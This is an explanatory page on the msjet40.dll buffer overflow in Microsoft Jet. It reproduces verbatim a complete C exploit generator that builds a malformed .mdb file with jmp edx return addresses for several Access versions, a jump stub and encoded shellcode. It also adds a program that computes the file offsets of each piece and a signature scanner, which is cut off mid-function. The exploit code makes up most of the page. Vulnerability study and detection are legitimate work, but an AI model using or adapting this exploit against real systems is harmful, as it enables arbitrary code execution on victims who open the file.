Microsoft Jet Database ('msjet40.dll') DB File Buffer Overflow Explained

What this paper is
This paper describes a buffer overflow vulnerability in the Microsoft Jet Database Engine, specifically within the msjet40.dll library. When a specially crafted .mdb (Microsoft Access Database) file is opened by an application that uses this DLL (like Microsoft Access itself), it can trigger a buffer overflow. This overflow allows an attacker to overwrite critical memory regions, including the instruction pointer (EIP), leading to the execution of arbitrary code. The exploit provided aims to launch calc.exe on the vulnerable system.
Simple technical breakdown
The core of the vulnerability lies in how msjet40.dll handles certain data within a .mdb file. The exploit modifies a specific section of the database file. This malformed data is then processed by the DLL, and due to insufficient validation, a buffer overflow occurs.
This overflow allows the attacker to control the program's execution flow by overwriting the return address or other control structures on the stack. The exploit specifically targets a mechanism that leads to a jmp edx instruction, where edx can be controlled by the attacker to point to their injected shellcode. The provided exploit uses a known offset for Microsoft Access to achieve this control.
Complete code and payload walkthrough
The C code provided constructs a malicious .mdb file. Let's break down the components:
Data Structures and Variables:
header[]: This array contains the initial bytes that form the beginning of a valid-looking .mdb file structure. It likely sets up the file header and some initial database metadata.
- Practical Purpose: Establishes a recognizable .mdb file format to avoid immediate rejection by the Jet engine.

body[]: This is a significant portion of the malformed data. It contains bytes that, when processed by the vulnerable msjet40.dll function, contribute to the buffer overflow. This section likely contains padding and specific values designed to trigger the overflow at a predictable location.
- Practical Purpose: Contains data that, when interpreted by the vulnerable parsing logic, leads to the overflow condition.

shell_jmp[]: This small array contains assembly instructions:
- \x14\x00: Likely part of an expanded ID parameter, as the comment notes; it makes room for the instructions that follow.
- \x83\xC6\x08: ADD ESI, 0x8. Adds 8 to the ESI register. In this context ESI is expected to point at the start of the shellcode; adding 8 might be to skip a small preamble or a jump instruction within the shellcode itself.
- \xFF\xE6: JMP ESI. Jumps to the address held in ESI, which executes the shellcode.
- \x90\x90\x90\x90 (repeated): NOP (No Operation) instructions, often used for padding or alignment. They are not directly used by the jmp edx mechanism here but might be part of the overall structure or a fallback.
- Practical Purpose: This is the crucial jump that redirects execution to the attacker's shellcode after the overflow has occurred and control has been gained.

EIP[]: This array contains a 4-byte address; the comments give different addresses for different versions of Microsoft Access.
- "\xF7\x69\x05\x30" (default): The address 0x300569F7, expected to contain an instruction like JMP EDX or a similar indirect jump. When the overflow occurs, the attacker overwrites the return address or a similar control-flow pointer with this value. The msjet40.dll code then executes at this address, which jumps to EDX, and EDX is controlled by the attacker to point to the shellcode.
- Practical Purpose: This is the target address the vulnerable function will jump to after the overflow, initiating the controlled execution path.

vuln_param[]: This section contains data that is manipulated by the vulnerable code.
- "\x18\x00\x50\x00\x61\x00\x72\x00\x65\x00\x6E\x00\x74\x00\x49\x00\x64\x00\x4E\x00\x61\x00\x6D\x00\x65\x00\x00\x01": This part seems to define a parameter, possibly a string, ending in the value 0x0100. The comment "// 0100 will result in EDX pointing to a variable containing our MSAccess offset" is key: the 0x0100 value is likely interpreted as a signed integer and used in an arithmetic operation (like the eax*4 mentioned in the narrative) to calculate an offset into a table, and that offset then points to a memory location holding the address of the jmp edx instruction.
- "\x04\x06\x00\x00\x05\x06": Additional data that likely forms part of the structure being processed.
- Practical Purpose: This section provides the specific input that triggers the vulnerable code path and influences the calculation of the jump target.

shellcode[]: This is the actual payload that will be executed: the machine-code byte sequence beginning "\x29\xC9\x83\xE9\xDB\xD9\xEE\xD9\x74\x24\xF4\x5B" (reproduced in full in the listing below). The comment indicates it invokes Calc.exe, a standard Windows operation likely performed through functions like CreateProcess or ShellExecute called indirectly. The shellcode is designed to be position-independent and to do its job without relying on specific memory addresses within the vulnerable process.
- Practical Purpose: The payload that achieves the attacker's objective, in this case launching calc.exe.

body2[]: Another segment of data that contributes to the overall .mdb file structure and potentially to the overflow.
- Practical Purpose: Completes the malformed .mdb file structure.

mdb[94208]: A large character array that holds the complete, constructed malicious .mdb file.

main() function:
- Handles command-line arguments, expecting a filename for the output .mdb file.
- Opens the specified file in binary write mode ("wb").
- Initializes the mdb buffer with null bytes (memset).
- Copies header, body, shell_jmp, EIP, vuln_param, shellcode, and body2 into the mdb buffer at specific offsets. The -1 in sizeof(header)-1 and the similar subtractions are common in C when dealing with string-like arrays that carry a null terminator, and ensure the correct number of bytes are copied. The memset calls with 0x43 (ASCII 'C') and the large 2924-byte padding fill gaps and ensure the final file size is consistent or large enough.
- Writes the complete mdb buffer to the output file.
- Closes the file.
- Prints messages indicating success.
Code Fragment/Block -> Practical Purpose Mapping:
| Code Fragment/Block | Practical Purpose |
| --- | --- |
| header[] | Establishes a recognizable .mdb file format to avoid immediate rejection by the Jet engine. |
| body[] | Contains data that, when interpreted by the vulnerable parsing logic, leads to the overflow condition. |
| shell_jmp[] | The jump stub that redirects execution to the attacker's shellcode once control has been gained. |
| EIP[] | The target address (jmp edx) the vulnerable function jumps to after the overflow. |
| vuln_param[] | Provides the specific input that triggers the vulnerable code path and influences the calculation of the jump target. |
| shellcode[] | The payload that achieves the attacker's objective, in this case launching calc.exe. |
| body2[] | Completes the malformed .mdb file structure. |
| mdb[94208] | Holds the complete constructed .mdb file that is written to disk. |
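To see where the generator actually places each piece, here is the offset arithmetic from main() carried through to concrete file offsets. This is an added example, not part of the Exploit-DB listing: the component lengths are my own counts of the escape sequences in each array of the listing below (the exploit itself only uses sizeof()), and the 4096-byte Jet 4 page size and the meaning of a leading 0x02 page byte (table definition) are known format facts the page does not state. The computation shows that body[] and body2[] are positioned so that the 02 01 bytes that open them (64 bytes into body[], at the very start of body2[]) land at 0x2000 and 0x3000, that is on page boundaries, and where shell_jmp, EIP, vuln_param and the shellcode sit relative to them.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Component lengths in bytes, counted from the escape sequences in the
 * exploit listing below (C terminator excluded). The counts are mine;
 * the exploit itself only ever uses sizeof(). */
enum {
    LEN_HEADER     = 160,
    PAD1           = 7968,   /* memset(..., 0x43, 7968) */
    LEN_BODY       = 1010,
    LEN_SHELL_JMP  = 18,
    LEN_EIP        = 4,
    LEN_VULN_PARAM = 34,
    LEN_SHELLCODE  = 172,
    PAD2           = 2924,   /* memset(..., 0x43, 2924) */
    LEN_BODY2      = 336,
    MDB_SIZE       = 94208,  /* char mdb[94208] */
    JET4_PAGE      = 4096    /* Jet 4 page size: a format fact, not from the page */
};

struct region { const char *name; size_t off; size_t len; };
#define NREGIONS 9

/* The offset expressions from main() in the exploit, with sizeof(x)-1
 * written as LEN_x and sizeof(x) (terminator included) as LEN_x + 1. */
size_t mdb_layout(struct region r[NREGIONS]) {
    size_t h     = LEN_HEADER;                       /* sizeof(header)-1 */
    size_t body  = h + 7969 - 1;                     /* memcpy(body)      */
    size_t sj    = h + PAD1 + LEN_BODY;              /* memcpy(shell_jmp) */
    size_t eip   = sj + LEN_SHELL_JMP;               /* memcpy(EIP)       */
    size_t vp    = eip + LEN_EIP;                    /* memcpy(vuln_param)*/
    size_t sc    = vp + LEN_VULN_PARAM;              /* memcpy(shellcode) */
    size_t pad2  = h + PAD1 - 1 + LEN_BODY + LEN_SHELL_JMP + LEN_EIP
                 + LEN_VULN_PARAM + (LEN_SHELLCODE + 1);        /* memset 2924 */
    size_t body2 = h + PAD1 - 1 + LEN_BODY + LEN_SHELL_JMP + LEN_EIP
                 + LEN_VULN_PARAM + LEN_SHELLCODE + PAD2 - 1;   /* memcpy(body2) */
    const struct region tmp[NREGIONS] = {
        {"header",       0,     LEN_HEADER},
        {"pad 0x43 (1)", h,     PAD1},
        {"body",         body,  LEN_BODY},
        {"shell_jmp",    sj,    LEN_SHELL_JMP},
        {"EIP",          eip,   LEN_EIP},
        {"vuln_param",   vp,    LEN_VULN_PARAM},
        {"shellcode",    sc,    LEN_SHELLCODE},
        {"pad 0x43 (2)", pad2,  PAD2},
        {"body2",        body2, LEN_BODY2},
    };
    memcpy(r, tmp, sizeof tmp);
    return NREGIONS;
}

/* Start offset of a named region, or (size_t)-1 if the name is unknown. */
size_t region_offset(const char *name) {
    struct region r[NREGIONS];
    size_t n = mdb_layout(r);
    for (size_t i = 0; i < n; i++)
        if (strcmp(r[i].name, name) == 0) return r[i].off;
    return (size_t)-1;
}

/* 1 if every region, padding included, lies inside mdb[MDB_SIZE]. */
int layout_fits(void) {
    struct region r[NREGIONS];
    size_t n = mdb_layout(r);
    for (size_t i = 0; i < n; i++)
        if (r[i].off + r[i].len > MDB_SIZE) return 0;
    return 1;
}

/* Where the two-byte 00 01 value from the narrative lands in this generator's
 * output: 26 bytes into vuln_param, after the 0x0018 length word and the
 * 24-byte UTF-16 string "ParentIdName". */
size_t vuln_word_offset(void) { return region_offset("vuln_param") + 26; }

/* Offset of the 02 01 bytes in body[]: they follow the 64 leading bytes of the array. */
size_t body_page_offset(void) { return region_offset("body") + 64; }

int main(void) {
    struct region r[NREGIONS];
    size_t n = mdb_layout(r);
    printf("%-14s %8s %6s  page-aligned\n", "region", "offset", "length");
    for (size_t i = 0; i < n; i++)
        printf("%-14s 0x%06zx %6zu  %s\n", r[i].name, r[i].off, r[i].len,
               r[i].off % JET4_PAGE == 0 ? "yes" : "no");
    printf("body page bytes at 0x%04zx, body2 at 0x%04zx, 00 01 value at 0x%04zx, fits: %d\n",
           body_page_offset(), region_offset("body2"), vuln_word_offset(), layout_fits());
    return 0;
}
```

The table this prints is what you would compare against a hex dump of a file produced by the generator: the 02 01 page bytes of body[] at 0x2000 and body2[] at 0x3000, shell_jmp at 0x23B2, the jmp edx address at 0x23C4, vuln_param at 0x23C8 with its 00 01 word at 0x23E2, and the shellcode from 0x23EA. Note that the advisory's 00002310 refers to the stock database.mdb it was derived from; in the generated file the 00 01 value sits later because the exploit expands the ID parameter.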
Original Exploit-DB Content (Verbatim)
/*
* --------------------------------------
*
* Microsoft Jet (msjet40.dll) Exploit
*
* --------------------------------------
*
* Author:
* ----------
* S.Pearson
* Computer Terrorism (UK)
* www.computerterrorism.com
* 11/04/2005
*
*
* Credits:
* ----------
* Hexview (original advisory)
*
*
* Tested on:
* -------------
* Windows 2000 SP4 (english)
* Windows XP SP0 (english)
* Windows XP SP1 (english)
*
*
* Requires:
* ------------
* MSAccess offset for stable jmp edx (could use others)
*
* 0x3005AD47 (Microsoft Access 2003)
* 0x300569F7 (Microsoft Access 2002) * DEFAULT *
* 0x3007F7FF (Microsoft Access 2000)
*
*
* Tech Overview:
* ------------------
* Simple exploit based upon Hexview's advisory
* released 01/04/2005.
*
* Should invoke Calc.exe when opened
*
*
* Narrative:
* ------------
* In the main this vulnerability is very simple to exploit
* although a little work is required to finally get to our
* shellcode.
*
* As per the original advisory, insufficient data
* validation is not performed when msjet40.dll
* parses a database file. Accordingly, by modifying
* parts of a .mdb database file, we can eventually
* gain control of the EIP.
*
*
* A database.mdb file is modified at the following location
*
* 00002310: 65 00 00 01 <--- vulnerable value in AX (0100)
*
* The value goes through a signed expansion that is
* used to access a 32-bit pointer to the variable that
* stores the address of a call table.
*
* mov ecx, [edi+eax*4+0B0h] // edx now points to an offset
* mov edx, [ecx] // from our malformed file
* call dword ptr [edx+10h] // (MSAccess jmp edx)
*
*
* jmp edx // EDX points to start of shell_jmp
* add esi,8 // Sets up esi to point to main shell
* call esi // Execute Shellcode
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char header[]=
"\x00\x01\x00\x00\x53\x74\x61\x6E\x64\x61\x72\x64\x20\x4A\x65\x74"
"\x20\x44\x42\x00\x01\x00\x00\x00\xB5\x6E\x03\x62\x60\x09\xC2\x55"
"\xE9\xA9\x67\x72\x40\x3F\x00\x9C\x7E\x9F\x90\xFF\x85\x9A\x31\xC5"
"\x79\xBA\xED\x30\xBC\xDF\xCC\x9D\x63\xD9\xE4\xC3\x9F\x46\xFB\x8A"
"\xBC\x4E\xB2\x6D\xEC\x37\x69\xD2\x9C\xFA\xF2\xC8\x28\xE6\x27\x20"
"\x8A\x60\x60\x02\x7B\x36\xC1\xE4\xDF\xB1\x43\x62\x13\x43\xFB\x39"
"\xB1\x33\x00\xF7\x79\x5B\xA6\x23\x7C\x2A\xAF\xD0\x7C\x99\x08\x1F"
"\x98\xFD\x1B\xC9\x5A\x6A\xE2\xF8\x82\x66\x5F\x95\xF8\xD0\x89\x24"
"\x85\x67\xC6\x1F\x27\x44\xD2\xEE\xCF\x65\xED\xFF\x07\xC7\x46\xA1"
"\x78\x16\x0C\xED\xE9\x2D\x62\xD4\x54\x06\x00\x00\x34\x2E\x30\x00";
char body[]=
"\x00\x00\x80\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\x02\x01\xDE\x0B\x00\x00\x00\x00\x90\x90\x90\x90\x59\x06\x00\x00"
"\x11\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x53\x11\x00\x0B\x00\x11\x00\x02"
"\x00\x00\x00\x02\x00\x00\x00\x00\x06\x00\x00\x01\x06\x00\x00\x00"
"\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11"
"\x00\x00\x00\x00\x00\x00\x00\x0C\x59\x06\x00\x00\x09\x00\x03\x00"
"\x00\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x0C\x59\x06\x00\x00\x08\x00\x02\x00\x00\x00\x09\x04\x00\x00\x12"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x59\x06\x00\x00\x04\x00"
"\x01\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00\x0a\x00"
"\x08\x00\x08\x59\x06\x00\x00\x05\x00\x01\x00\x00\x00\x09\x04\x00"
"\x00\x13\x00\x00\x00\x00\x00\x12\x00\x08\x00\x04\x59\x06\x00\x00"
"\x07\x00\x02\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00"
"\x1A\x00\x04\x00\x0A\x59\x06\x00\x00\x0A\x00\x04\x00\x00\x00\x09"
"\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\xFE\x01\x04\x59\x06"
"\x00\x00\x00\x00\x00\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00"
"\x00\x00\x00\x00\x04\x00\x0B\x59\x06\x00\x00\x0D\x00\x07\x00\x00"
"\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B"
"\x59\x06\x00\x00\x10\x00\x0A\x00\x00\x00\x09\x04\x00\x00\x12\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x59\x06\x00\x00\x0F\x00\x09"
"\x00\x00\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x0B\x59\x06\x00\x00\x0E\x00\x08\x00\x00\x00\x09\x04\x00\x00"
"\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x59\x06\x00\x00\x02"
"\x00\x00\x00\x00\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00"
"\x00\xFE\x01\x09\x59\x06\x00\x00\x06\x00\x01\x00\x00\x00\x09\x04"
"\x00\x00\x32\x00\x00\x00\x00\x00\x00\x00\xFE\x01\x04\x59\x06\x00"
"\x00\x01\x00\x00\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00"
"\x00\x04\x00\x04\x00\x0B\x59\x06\x00\x00\x0C\x00\x06\x00\x00\x00"
"\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x59"
"\x06\x00\x00\x0B\x00\x05\x00\x00\x00\x09\x04\x00\x00\x12\x00\x00"
"\x00\x00\x00\x00\x00\xFE\x01\x03\x59\x06\x00\x00\x03\x00\x01\x00"
"\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00\x08\x00\x02\x00"
"\x0E\x00\x43\x00\x6F\x00\x6E\x00\x6E\x00\x65\x00\x63\x00\x74\x00"
"\x10\x00\x44\x00\x61\x00\x74\x00\x61\x00\x62\x00\x61\x00\x73\x00"
"\x65\x00\x14\x00\x44\x00\x61\x00\x74\x00\x65\x00\x43\x00\x72\x00"
"\x65\x00\x61\x00\x74\x00\x65\x00\x14\x00\x44\x00\x61\x00\x74\x00"
"\x65\x00\x55\x00\x70\x00\x64\x00\x61\x00\x74\x00\x65\x00\x0A\x00"
"\x46\x00\x6C\x00\x61\x00\x67\x00\x73\x00\x16\x00\x46\x00\x6F\x00"
"\x72\x00\x65\x00\x69\x00\x67\x00\x6E\x00\x4E\x00\x61\x00\x6D\x00"
"\x65\x00\x04\x00\x49\x00\x64\x00\x04\x00\x4C\x00\x76\x00\x0E\x00"
"\x4C\x00\x76\x00\x45\x00\x78\x00\x74\x00\x72\x00\x61\x00\x10\x00"
"\x4C\x00\x76\x00\x4D\x00\x6F\x00\x64\x00\x75\x00\x6C\x00\x65\x00"
"\x0C\x00\x4C\x00\x76\x00\x50\x00\x72\x00\x6F\x00\x70\x00\x08\x00"
"\x4E\x00\x61\x00\x6D\x00\x65\x00\x0A\x00\x4F\x00\x77\x00\x6E\x00"
"\x65\x00\x72\x00\x10\x00\x50\x00\x61\x00\x72\x00\x65\x00\x6E\x00"
"\x74\x00\x49\x00\x64\x00\x16\x00\x52\x00\x6D\x00\x74\x00\x49\x00"
"\x6E\x00\x66\x00\x6F\x00\x4C\x00\x6F\x00\x6E\x00\x67\x00\x18\x00"
"\x52\x00\x6D\x00\x74\x00\x49\x00\x6E\x00\x66\x00\x6F\x00\x53\x00"
"\x68\x00\x6F\x00\x72\x00\x74\x00\x08\x00\x54\x00\x79\x00\x70\x00"
"\x65\x00\x83\x07\x00\x00\x01\x00\x01\x02\x00\x01\xFF\xFF\x00\xFF"
"\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF"
"\x00\xFF\xFF\x00\x10\x06\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00"
"\x81\x00\x00\x00\x00\x00\x83\x07\x00\x00\x00\x00\x01\xFF\xFF\x00"
"\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF"
"\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\x11\x06\x00\x00\x08\x00\x00\x00"
"\x00\x00\x00\x00\x81\x00\x00\x00\x00\x00\x59\x06\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x04"
"\x04\x01\x00\x00\x00\x00\x59\x06\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x04\x04\x00\x00\x00"
"\x00\x00";
char shell_jmp[]=
"\x14\x00" // Expanded ID Parameter (20 bytes) to accommodate this code
"\x83\xC6\x08" // Add ESI,8 (Pointer to our shellcode)
"\xFF\xE6" // Call ESI (Execute Shellcode)
"\x90\x90\x90\x90"
"\x90\x90\x90\x90" // Not used
"\x90\x90\x90";
char EIP[]=
//"\x47\xAD\x05\x30"; // MSAccess 2003 (jmp edx)
"\xF7\x69\x05\x30"; // MSAccess 2002 (jmp edx)
//"\xFf\xf7\x07\x30"; // MSAccess 2000 (jmp edx)
char vuln_param[]=
"\x18\x00\x50\x00"
"\x61\x00\x72\x00"
"\x65\x00\x6E\x00"
"\x74\x00\x49\x00"
"\x64\x00\x4E\x00"
"\x61\x00\x6D\x00"
"\x65\x00\x00\x01" // 0100 will result in EDX pointing to a
// variable containing our MSAccess offset
"\x04\x06\x00\x00"
"\x05\x06" ;
char shellcode[]=
/* Invokes Calc.exe in another Process
*/
"\x29\xC9\x83\xE9\xDB\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xA9"
"\x67\x4A\xCC\x83\xEB\xFC\xE2\xF4\x55\x8F\x0C\xCC\xA9\x67\xC1\x89"
"\x95\xEC\x36\xC9\xD1\x66\xA5\x47\xE6\x7F\xC1\x93\x89\x66\xA1\x2F"
"\x87\x2E\xC1\xF8\x22\x66\xA4\xFD\x69\xFE\xE6\x48\x69\x13\x4D\x0D"
"\x63\x6A\x4B\x0E\x42\x93\x71\x98\x8D\x63\x3F\x2F\x22\x38\x6E\xCD"
"\x42\x01\xC1\xC0\xE2\xEC\x15\xD0\xA8\x8C\xC1\xD0\x22\x66\xA1\x45"
"\xF5\x43\x4E\x0F\x98\xA7\x2E\x47\xE9\x57\xCF\x0C\xD1\x68\xC1\x8C"
"\xA5\xEC\x3A\xD0\x04\xEC\x22\xC4\x40\x6C\x4A\xCC\xA9\xEC\x0A\xF8"
"\xAC\x1B\x4A\xCC\xA9\xEC\x22\xF0\xF6\x56\xBC\xAC\xFF\x8C\x47\xA4"
"\xD7\xBF\xA8\xBF\xC1\xFF\xB4\x46\xA7\x30\xB5\x2B\x41\x89\xB5\x33"
"\x56\x04\x2B\xA0\xCA\x49\x2F\xB4\xCC\x67\x4A\xCC";
char body2[]=
"\x02\x01\xA9\x0E\x00\x00\x00\x00\x4F\x01\x00\x00\x59\x06\x00\x00"
"\x34\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x53\x04\x00\x01\x00\x04\x00\x01"
"\x00\x00\x00\x01\x00\x00\x00\x12\x06\x00\x00\x13\x06\x00\x00\x00"
"\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x04\x59\x06\x00\x00"
"\x02\x00\x01\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00"
"\x04\x00\x04\x00\x01\x59\x06\x00\x00\x03\x00\x01\x00\x00\x00\x09"
"\x04\x00\x00\x13\x00\x00\x00\x00\x00\x00\x00\x01\x00\x04\x59\x06"
"\x00\x00\x00\x00\x00\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00"
"\x00\x00\x00\x00\x04\x00\x09\x59\x06\x00\x00\x01\x00\x00\x00\x00"
"\x00\x09\x04\x00\x00\x32\x00\x00\x00\x00\x00\x07\x00\xFE\x01\x06"
"\x00\x41\x00\x43\x00\x4D\x00\x18\x00\x46\x00\x49\x00\x6E\x00\x68"
"\x00\x65\x00\x72\x00\x69\x00\x74\x00\x61\x00\x62\x00\x6C\x00\x65"
"\x00\x10\x00\x4F\x00\x62\x00\x6A\x00\x65\x00\x63\x00\x74\x00\x49"
"\x00\x64\x00\x06\x00\x53\x00\x49\x00\x44\x00\x83\x07\x00\x00\x00"
"\x00\x01\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x09\xFF\xFF\x00\xFF\xFF"
"\x00\xFF\xFF\x00\xFF\xFF\x04\xFF\xFF\x12\xFF\xFF\x00\x14\x06\x00"
"\x00\x09\x000\x0\x00\x41\x00\x74\x00\x88\x00\x00\x00\x00\x00\x59"
"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF"
"\x00\x00\x00\x00\x04\x04\x00\x00\x00\x00\x00\x10\x00\x4F\x00\x62"
"\x00\x6A\x00\x65\x00\x63\x00\x74\x00\x49\x00\x64\x00\xFF\xFF\x00";
char mdb[94208];
int main(int argc,char *argv[])
{
FILE *filename_mdb;
if(argc == 1)
{
printf("\nMicrosoft Jet (msjet40.dll) Exploit\n");
printf("===================================\n\n");
printf("Author: S.Pearson\n");
printf("Organisation: Computer Terrorism (UK)\n\n");
printf("Usage: %s <filename.mdb>\n",argv[0]);
return 1;
}
filename_mdb = fopen(argv[1],"wb");
memset(mdb,0x00,sizeof(mdb)); //fill with nulls
memcpy(mdb,header,sizeof(header));
memset(mdb+sizeof(header)-1,0x43, 7968);
memcpy(mdb+sizeof(header)-1+7969-1,body, sizeof(body));
memcpy(mdb+sizeof(header)-1+7968+sizeof(body)-1,shell_jmp, sizeof(shell_jmp));
memcpy(mdb+sizeof(header)-1+7968+sizeof(body)-1+sizeof(shell_jmp)-1, EIP, sizeof(EIP));
memcpy(mdb+sizeof(header)-1+7968+sizeof(body)-1+sizeof(shell_jmp)-1+sizeof(EIP)-1, vuln_param, sizeof(vuln_param));
memcpy(mdb+sizeof(header)-1+7968+sizeof(body)-1+sizeof(shell_jmp)-1+sizeof(EIP)-1+sizeof(vuln_param)-1, shellcode, sizeof(shellcode));
memset(mdb+sizeof(header)-1+7968-1+sizeof(body)-1+sizeof(shell_jmp)-1+sizeof(EIP)-1+sizeof(vuln_param)-1+sizeof(shellcode), 0x43, 2924);
memcpy(mdb+sizeof(header)-1+7968-1+sizeof(body)-1+sizeof(shell_jmp)-1+sizeof(EIP)-1+sizeof(vuln_param)-1+sizeof(shellcode)-1+2924-1,body2,sizeof(body2));
if(filename_mdb)
{
fwrite(mdb,1,sizeof(mdb),filename_mdb);
fclose(filename_mdb);
}
printf("Malformed .mdb file created.\n");
printf("Now open with MSAccess.\n");
return 0;
}
// milw0rm.com [2005-04-11]
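For the defender, the listing above gives a small set of byte-level markers that a file carrying this exploit would contain. The scanner below checks an in-memory .mdb image for them. It is an added example, not part of the Exploit-DB listing and not Computer Terrorism's or Hexview's code; the patterns are taken from the listing: the Jet signature bytes that open header[], the add esi,8 / jmp esi stub from shell_jmp[], the three jmp edx addresses from the Requires section written little-endian, and the fldz / fnstenv [esp-0Ch] pair that opens shellcode[], which is a common GetPC idiom of self-decoding payloads (that identification is mine, not the page's). The sample buffer in main() is constructed for the demonstration and is neither a real database nor the generator's output.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Byte patterns taken from the exploit listing above. */
static const unsigned char JET_MAGIC[]     = "\x00\x01\x00\x00Standard Jet DB"; /* header[], offset 0 */
static const unsigned char STUB_JMP[]      = "\x83\xC6\x08\xFF\xE6";             /* shell_jmp[]: add esi,8 ; jmp esi */
static const unsigned char GADGET_2003[]   = "\x47\xAD\x05\x30";                 /* 0x3005AD47, little-endian */
static const unsigned char GADGET_2002[]   = "\xF7\x69\x05\x30";                 /* 0x300569F7, the default EIP[] */
static const unsigned char GADGET_2000[]   = "\xFF\xF7\x07\x30";                 /* 0x3007F7FF */
/* fldz ; fnstenv [esp-0Ch]: the GetPC idiom at the start of shellcode[] (my identification) */
static const unsigned char GETPC_FNSTENV[] = "\xD9\xEE\xD9\x74\x24\xF4";

struct sig { const char *name; const unsigned char *pat; size_t len; };
struct hit { const char *name; size_t offset; };

static const struct sig SIGS[] = {
    {"shell_jmp stub (add esi,8 ; jmp esi)", STUB_JMP,      sizeof STUB_JMP - 1},
    {"jmp edx address, Access 2003",         GADGET_2003,   sizeof GADGET_2003 - 1},
    {"jmp edx address, Access 2002",         GADGET_2002,   sizeof GADGET_2002 - 1},
    {"jmp edx address, Access 2000",         GADGET_2000,   sizeof GADGET_2000 - 1},
    {"fnstenv GetPC stub",                   GETPC_FNSTENV, sizeof GETPC_FNSTENV - 1},
};
#define NSIGS (sizeof SIGS / sizeof SIGS[0])
#define MAX_HITS 32
#define SAMPLE_SIZE 0x100

/* 1 if buf starts with the Jet signature found in header[]. */
int has_jet_magic(const unsigned char *buf, size_t len) {
    return len >= sizeof JET_MAGIC - 1 && memcmp(buf, JET_MAGIC, sizeof JET_MAGIC - 1) == 0;
}

/* Naive multi-pattern scan over the whole image. Returns the total number of
 * matches and stores up to max_hits of them, grouped by signature, then offset. */
size_t scan_mdb(const unsigned char *buf, size_t len, struct hit *hits, size_t max_hits) {
    size_t n = 0;
    for (size_t s = 0; s < NSIGS; s++) {
        const struct sig *g = &SIGS[s];
        for (size_t off = 0; off + g->len <= len; off++) {
            if (memcmp(buf + off, g->pat, g->len) == 0) {
                if (n < max_hits) { hits[n].name = g->name; hits[n].offset = off; }
                n++;
            }
        }
    }
    return n;
}

/* 0 = no Jet signature, 1 = Jet file without markers, 2 = Jet file with at least one marker. */
int classify_mdb(const unsigned char *buf, size_t len) {
    struct hit h[MAX_HITS];
    if (!has_jet_magic(buf, len)) return 0;
    return scan_mdb(buf, len, h, MAX_HITS) > 0 ? 2 : 1;
}

/* Constructed sample: the Jet signature, the 0x43 filler the generator uses,
 * and three markers planted at known offsets. Not a real database. */
size_t build_sample(unsigned char *buf, size_t cap) {
    if (cap < SAMPLE_SIZE) return 0;
    memset(buf, 0x43, SAMPLE_SIZE);
    memcpy(buf,        JET_MAGIC,     sizeof JET_MAGIC - 1);
    memcpy(buf + 0x40, STUB_JMP,      sizeof STUB_JMP - 1);
    memcpy(buf + 0x52, GADGET_2002,   sizeof GADGET_2002 - 1);
    memcpy(buf + 0x60, GETPC_FNSTENV, sizeof GETPC_FNSTENV - 1);
    return SAMPLE_SIZE;
}

static size_t demo_scan(struct hit *hits) {
    unsigned char buf[SAMPLE_SIZE];
    size_t len = build_sample(buf, sizeof buf);
    return scan_mdb(buf, len, hits, MAX_HITS);
}
size_t demo_hit_count(void)         { struct hit h[MAX_HITS]; return demo_scan(h); }
size_t demo_hit_offset(size_t i)    { struct hit h[MAX_HITS]; return i < demo_scan(h) ? h[i].offset : (size_t)-1; }
const char *demo_hit_name(size_t i) { struct hit h[MAX_HITS]; return i < demo_scan(h) ? h[i].name : ""; }
int demo_classify(void) {
    unsigned char b[SAMPLE_SIZE];
    size_t len = build_sample(b, sizeof b);
    return classify_mdb(b, len);
}
/* A Jet image with no markers must classify as 1, not 2. */
int demo_classify_clean(void) {
    unsigned char b[SAMPLE_SIZE];
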